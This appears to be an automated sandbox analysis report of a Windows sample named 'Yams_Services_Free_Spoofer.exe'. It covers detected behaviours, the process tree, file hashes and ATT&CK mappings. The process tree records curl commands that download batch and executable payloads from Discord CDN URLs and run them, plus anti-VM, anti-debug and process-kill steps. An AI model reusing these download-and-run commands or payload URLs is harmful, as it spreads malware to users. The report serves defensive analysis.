Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-03-2023 10:55

General

  • Target

    Yams_Services_Free_Spoofer.exe

  • Size

    3.7MB

  • MD5

    b7b3977d71565f7439d8678a4588c503

  • SHA1

    d9552cc2ccd6f6e301b9fdaed8d86c22dc9740b2

  • SHA256

    c6a00f85e448a6278cea21dbd835d99d1ebd227828096e5f02fcb41f141bea69

  • SHA512

    4b9e53d7ec59d189f2b5693fa2193490ad53f9c042219f30ebe291ea7768b7b1cc6ce8d7c1bd3dc6705ec342f09c0c93f42c283e2995a3843dd561736e101ce5

  • SSDEEP

    98304:wtNJ1joN3XNBr7PuUZJunmnY7zL1V3ekh8bCZ9+RkOKlDwKtN:yBoNnrr7PrJumnY3LN8+KMDw2N

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Yams_Services_Free_Spoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\Yams_Services_Free_Spoofer.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:444
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c color d
      2⤵
        PID:4176
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start https://discord.gg/heck
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4248
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/heck
          3⤵
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:224
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xe4,0x104,0x7ffe61f846f8,0x7ffe61f84708,0x7ffe61f84718
            4⤵
              PID:4004
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,6008011645252434212,1075441086989619749,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
              4⤵
                PID:3712
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,6008011645252434212,1075441086989619749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1800
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,6008011645252434212,1075441086989619749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                4⤵
                  PID:4688
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,6008011645252434212,1075441086989619749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
                  4⤵
                    PID:4036
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,6008011645252434212,1075441086989619749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
                    4⤵
                      PID:4792
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,6008011645252434212,1075441086989619749,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5200 /prefetch:8
                      4⤵
                        PID:1068
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,6008011645252434212,1075441086989619749,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
                        4⤵
                          PID:4172
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Yams_Services_Free_Spoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3312
                      • C:\Windows\system32\certutil.exe
                        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Yams_Services_Free_Spoofer.exe" MD5
                        3⤵
                          PID:3804
                        • C:\Windows\system32\find.exe
                          find /i /v "md5"
                          3⤵
                            PID:4060
                          • C:\Windows\system32\find.exe
                            find /i /v "certutil"
                            3⤵
                              PID:4988
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c cls
                            2⤵
                              PID:3560
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c cls
                              2⤵
                                PID:4456
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c color 7
                                2⤵
                                  PID:1600
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c cls
                                  2⤵
                                    PID:2092
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1080966737450778664/1088116065462141010/ys_cleaner.bat -o C:\ProgramData\cleaner1.bat --silent
                                    2⤵
                                      PID:1480
                                      • C:\Windows\system32\curl.exe
                                        curl https://cdn.discordapp.com/attachments/1080966737450778664/1088116065462141010/ys_cleaner.bat -o C:\ProgramData\cleaner1.bat --silent
                                        3⤵
                                          PID:1972
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cls
                                        2⤵
                                          PID:4736
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1080966737450778664/1090947491287015504/cleaner.bat -o C:\ProgramData\cleaner2.bat --silent
                                          2⤵
                                            PID:4416
                                            • C:\Windows\system32\curl.exe
                                              curl https://cdn.discordapp.com/attachments/1080966737450778664/1090947491287015504/cleaner.bat -o C:\ProgramData\cleaner2.bat --silent
                                              3⤵
                                                PID:4156
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c cls
                                              2⤵
                                                PID:1696
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1080966737450778664/1080968747805855926/cleaner_fixed.exe -o C:\ProgramData\cleaner3.exe --silent
                                                2⤵
                                                  PID:4676
                                                  • C:\Windows\system32\curl.exe
                                                    curl https://cdn.discordapp.com/attachments/1080966737450778664/1080968747805855926/cleaner_fixed.exe -o C:\ProgramData\cleaner3.exe --silent
                                                    3⤵
                                                      PID:4916
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c cls
                                                    2⤵
                                                      PID:3496
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\cleaner1.bat
                                                      2⤵
                                                        PID:1236
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
                                                          3⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4756
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                          3⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1592
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
                                                          3⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1188
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /f /im FortniteLauncher.exe
                                                          3⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4364
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /f /im EpicGamesLauncher.exe
                                                          3⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:676
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\ProgramData\cleaner1.bat"
                                                          3⤵
                                                            PID:1736
                                                            • C:\Windows\system32\findstr.exe
                                                              findstr /b ::: "C:\ProgramData\cleaner1.bat"
                                                              4⤵
                                                                PID:4392
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:1796

                                                          Network

                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                          Defense Evasion

                                                          Virtualization/Sandbox Evasion

                                                          1
                                                          T1497

                                                          Discovery

                                                          Query Registry

                                                          3
                                                          T1012

                                                          Virtualization/Sandbox Evasion

                                                          1
                                                          T1497

                                                          System Information Discovery

                                                          4
                                                          T1082

                                                          Command and Control

                                                          Web Service

                                                          1
                                                          T1102

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\ProgramData\cleaner1.bat
                                                            Filesize

                                                            106KB

                                                            MD5

                                                            046792c6a956f55174a4ddbb4509188c

                                                            SHA1

                                                            795325f387de1e9fbf3b3a8ae26dc9a5a9a1c4cf

                                                            SHA256

                                                            206a3bae5978610de6eefed3b0a3e3d66f786814be01ff83b0dab2e8d1e9c65a

                                                            SHA512

                                                            0083b3d4e97f0ded4b606e216d0811aef8e83df0c369646df90e367f07fa3c161108431d0e4f7796a3c87f6a72bc7646120ca09bb768245e5babf33b4df1b1b4

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                            Filesize

                                                            152B

                                                            MD5

                                                            cd4f5fe0fc0ab6b6df866b9bfb9dd762

                                                            SHA1

                                                            a6aaed363cd5a7b6910e9b3296c0093b0ac94759

                                                            SHA256

                                                            3b803b53dbd3d592848fc66e5715f39f6bc02cbc95fb2452cd5822d98c6b8f81

                                                            SHA512

                                                            7072630ec28cf6a8d5b072555234b5150c1e952138e5cdc29435a6242fda4b4217b81fb57acae927d2b908fa06f36414cb3fab35110d63107141263e3bba9676

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                            Filesize

                                                            152B

                                                            MD5

                                                            1d40312629d09d2420e992fdb8a78c1c

                                                            SHA1

                                                            903950d5ba9d64ec21c9f51264272ca8dfae9540

                                                            SHA256

                                                            1e7c6aa575c3ec46cd1fdf6df51063113d277012ed28f5f6b37aea95cd3a64ac

                                                            SHA512

                                                            a7073247ae95e451ed32ceeae91c6638192c15eaad718875c1272eff51c0564016d9f84690543f27df509a7d579de329d101fbf82fed7cbeb27af57393de24ac

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                            Filesize

                                                            120B

                                                            MD5

                                                            96d99c57699ba3367b8d00bd09905c85

                                                            SHA1

                                                            94d2909ba0c2cc3db739874c0ec9c4b3ad5cbfab

                                                            SHA256

                                                            8c47e52bce95159694802b29adfb8c4a11c9f9c4d73c1901c7826dab53be8e84

                                                            SHA512

                                                            e665b5ac19fb5e06fec37f0eefa6c184c08cc785fc73feb78b5482774ba9b59c15c86cd19e7a4623f55767d340f88b5058e9303ea6e945b5b540977b2687fa14

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe56a628.TMP
                                                            Filesize

                                                            48B

                                                            MD5

                                                            2fd0ad8affe0de3b559313ec433ca441

                                                            SHA1

                                                            9c8c55bf505fd7ed7231b5b963fec0a640eb769b

                                                            SHA256

                                                            2afe4b9acc5ad22389db2e7aff9dd19406ba9bac8544396d62ee1f3972686155

                                                            SHA512

                                                            1e9de1515b101624df546f6f73624480179a9c9f4e8e1615a4e82c13940855a2d0d9a10fda70583129611f9333106e207f459e138af993aca32dff294bb7beae

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
                                                            Filesize

                                                            70KB

                                                            MD5

                                                            e5e3377341056643b0494b6842c0b544

                                                            SHA1

                                                            d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                            SHA256

                                                            e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                            SHA512

                                                            83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            ecfc5961e7f0d4884f52ecbfe01f2e39

                                                            SHA1

                                                            f06983887eb11b1d809c60817e02694168c74d94

                                                            SHA256

                                                            863e6f829e06bc6044a85c4d15af72a851363ee1201d8879c091fab02da2e120

                                                            SHA512

                                                            efe03cf6dcc6b05ceba3ab0357b9806bb0c415a729058db49631f9859ab4112bf0e94b50648a5fb606e2c42e335b20dbcff41271323f62b4cc6efa9d01834779

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                            Filesize

                                                            459B

                                                            MD5

                                                            1577516763bd950dd4e3806f5f98bbfb

                                                            SHA1

                                                            7e6e07830f4e3a696bed57bed1e2aea91fb689fa

                                                            SHA256

                                                            783596d8033e6f9a1902085579f434c7dd3ed1dc99c0a332984a015bc390e9da

                                                            SHA512

                                                            bf376cb7a51ae8a6860fe7fa3de6c77dec49ac1efa7573f1c3a3bcbec65f0b00158cb79d5eab4a0727041357bf9f796f511ad2cc1fca6e12821a33e60d7c922e

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            4KB

                                                            MD5

                                                            aa18dfe1bfc89353dfdfdeebce25f2fd

                                                            SHA1

                                                            c1dda052156df6241a34aa021c9282c871d1e4c8

                                                            SHA256

                                                            bd20d1d1b73f6d7a9ad8bdb948c8b2f10574563b6f05d0a24b5c45b9e48923b1

                                                            SHA512

                                                            6b75b2ae346ea9109fd5648ab0319ab698747a844ea24e1f3d12aa65e1f59b1d25055bca69e9e9a2f3d7632a9b9c9b7967664cdcd10db5af06df052a39078d0b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            8cfbfe30ec7cd52bcb68028878a2ca0d

                                                            SHA1

                                                            36815cfebf62450f79ffd940d09ef2ba3aa8df5b

                                                            SHA256

                                                            dcaf7ab15b8ea7e32d9f1bdd2ef244f3d3b32ab659de68c939f1e45776f1da40

                                                            SHA512

                                                            a3c7f1bb56569bbcc02f938322ca159213abb82ecc90744a6b6c22fcaee7082d275bc3ad7f141f9d2a4c0c80d8ac2a760fd9bccf1deb2d7fa8465cf2c5a4848d

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                                            Filesize

                                                            24KB

                                                            MD5

                                                            1463bf2a54e759c40d9ad64228bf7bec

                                                            SHA1

                                                            2286d0ac3cfa9f9ca6c0df60699af7c49008a41f

                                                            SHA256

                                                            9b4fd2eea856352d8fff054b51ea5d6141a540ca253a2e4dc28839bc92cbf4df

                                                            SHA512

                                                            33e0c223b45acac2622790dda4b59a98344a89094c41ffdb2531d7f1c0db86a0ea4f1885fea7c696816aa4ceab46de6837cc081cd8e63e3419d9fcb8c5a0eb66

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
                                                            Filesize

                                                            16B

                                                            MD5

                                                            46295cac801e5d4857d09837238a6394

                                                            SHA1

                                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                            SHA256

                                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                            SHA512

                                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
                                                            Filesize

                                                            41B

                                                            MD5

                                                            5af87dfd673ba2115e2fcf5cfdb727ab

                                                            SHA1

                                                            d5b5bbf396dc291274584ef71f444f420b6056f1

                                                            SHA256

                                                            f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                            SHA512

                                                            de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
                                                            Filesize

                                                            264KB

                                                            MD5

                                                            f50f89a0a91564d0b8a211f8921aa7de

                                                            SHA1

                                                            112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                            SHA256

                                                            b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                            SHA512

                                                            bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                            Filesize

                                                            9KB

                                                            MD5

                                                            b80edbc67c01114408c96f5b640deedb

                                                            SHA1

                                                            9511ffcaba9ccefcc4ac1114e0624257b7315a73

                                                            SHA256

                                                            77d95327ca115251655a2d13bb1eb5017dc9596a8400d6a93a3f57fafdbc1485

                                                            SHA512

                                                            5234ea84bbfa1c173021e0514e72edad3f4242a98cbef3d87198bf4ec635de0b9f18e7e0589c86e1f0773a60c41d2870d98d708b4cdf0e1f0ded21f7beea8291

                                                          • \??\pipe\LOCAL\crashpad_224_HFTSARRXFJEQFAPN
                                                            MD5

                                                            d41d8cd98f00b204e9800998ecf8427e

                                                            SHA1

                                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                            SHA256

                                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                            SHA512

                                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                          • memory/444-140-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-138-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-137-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-136-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-135-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-134-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-374-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-375-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-133-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-382-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB

                                                          • memory/444-388-0x00007FF733330000-0x00007FF733CE0000-memory.dmp
                                                            Filesize

                                                            9.7MB